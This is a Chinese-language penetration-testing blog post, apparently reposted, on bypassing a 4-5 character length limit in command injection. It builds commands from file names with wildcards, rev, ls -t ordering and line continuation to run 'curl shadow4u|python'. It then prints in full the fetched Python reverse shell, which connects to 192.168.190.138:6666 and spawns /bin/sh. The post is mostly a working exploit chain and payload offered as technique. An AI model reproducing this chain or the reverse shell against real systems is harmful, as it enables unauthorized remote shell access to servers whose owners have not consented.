挖洞经验 | 命令注入突破长度限制

最新推荐文章于 2023-12-25 14:23:54 发布

PD_3569

最新推荐文章于 2023-12-25 14:23:54 发布

阅读量2.5k

点赞数 1

分类专栏：渗透

渗透专栏收录该内容

59 篇文章 11 订阅

订阅专栏

0×01 背景

http://www.freebuf.com/articles/web/154453.html

很多时候，在我们历经千辛万苦挖掘出一个漏洞或者找到一个利用点的时候，却因为一些egg hurt的限制，导致get shell或者send payload无法成功，其实很多高手都是有一些trick的，但是往往一串包含各种trick的高深payload甩得你不知所云

最近遇到这样一个问题。命令长度限制在5，如何完成注入get shell？

Array什么的都尝试无果，在学习了各种大牛的trick后，才恍然大悟，希望给初学者提供一些新的思路，集思广益。

0×02 命令组装

首先是命令组装，先来看一个例子，准备工作 mkdir cmd;cd cmd;

分别输入>echo >hello，可以看到分别创建了两个文件echo和 hello，然后执行*，结果输出了hello

很多人一定已经明白

*此时等于 echo hello，我们可以通过echo * 来查看*到底是啥

这样，我们通过>echo >hello 完成命令组装，然后* 组成并执行了命令echo hello

同样的道理

不过这次让我们把命令长度限制到4

那么如果我们要执行命令ls -l怎么办

我们模仿上面做法，输入>ls 和>-l产生了两个文件 ls -l

这有个问题，我们刚才生成的echo和hello，e 的顺序正好在h之前，所以ok。但是此时文件的显示顺序-l在 ls前面，如果我们执行* 其实是执行-l ls，会出现错误

那么如何获得ls -l呢，先是第一种思路

0×03 反转命令

我们把这个命令字符序列反过来看 l- sl

这样是不是顺序正好满足要求，接下来我们只需要用一个可以把字符反过来的命令，就可以完成这个功能

这样，我们先生成l-和sl两个命令

然后将l- sl组合写入文件v（为什么文件名要用v ，下面会解释，是个trick），最后用一个命令将文件中的字节反转

如果我们直接使用ls>v

可以看到文件v中多了一个v，对我们命令造成干扰

我们只想文件中存在l-和sl

trick1

这里有个技巧

dir a b>c只会将a b写到文件c中

我们创建一个名为dir的文件，然后执行*>v，可以获得l- 和ls

接下来就是反序

trick2

有一个rev命令，正好可以将内容反序，我们产生一个名为rev的文件，然后执行*v ，此时命令相当于rev v（这里就是上面为啥文件命名为v，为了被通配符匹配），这样就产生了我们要的输出ls -l

然后就是输出到文件x，然后就可以执行sh x，成功以4 个字符执行长度为5的ls -l命令

整个命令链(长度<=4)

完成ls -l

0×04 控制顺序

理解上述命令之后

假设我们要生成ls -t >g

逆序是g< t- sl，按照字母顺序 t- 会在 sl 后面，不满足需要。所以我们变通一下，生成命令ls -th >g，逆序就是g> ht- sl，正好满足顺序要求，然后依葫芦画瓢

trick3

上面说到文件名排列的时候有默认顺序，怎么自由控制顺序呢

其实ls -t 也就是根据mtime排序，新的在前面

而-h对顺序本身没什么影响，可以方便构造payload

比如我们要生成ls -l，可以通过ls -t打破默认顺序

0×05 命令续行

通过前面的一连串命令，我们已经得到ls -th >g

trick4

然后还有一点，linux的命令续行，比如l\s分成两行，都是ok

这样，我们就可以构造一连串的拼接命令续航。比如，我要构造命令curl shadow4u|python;

>py\\这里看着是5个字符，超过了4个的限制，实际上是因为 shell环境需要输入\\产生\，但是php 代码exec时，只需要输入\即可产生\，比如 exec(“>py\”)即可。所以这里实际上是不超过4个字符的，为了演示直观，在shell中直接执行。

执行ls -th>g

然后sh g，实际执行反弹shell命令

curl shadow4u获得的内容

importsocket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.190.138",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

0×06 payload链

所以，完整payload链为

生成包含ls -th >g文件x

然后生成curl shadow4u|python命令续行文件

然后执行sh x把curl shadow4u|python命令写入文件g

然后执行sh g，getshell

0×07 总结

4个trick思路加上重定向和反弹shell知识

trick1 命令组装 dir a b >c

trick2 通配符的妙用 *v=rev v

trick3 按时间顺序排列文件 ls -t

trick4 命令续行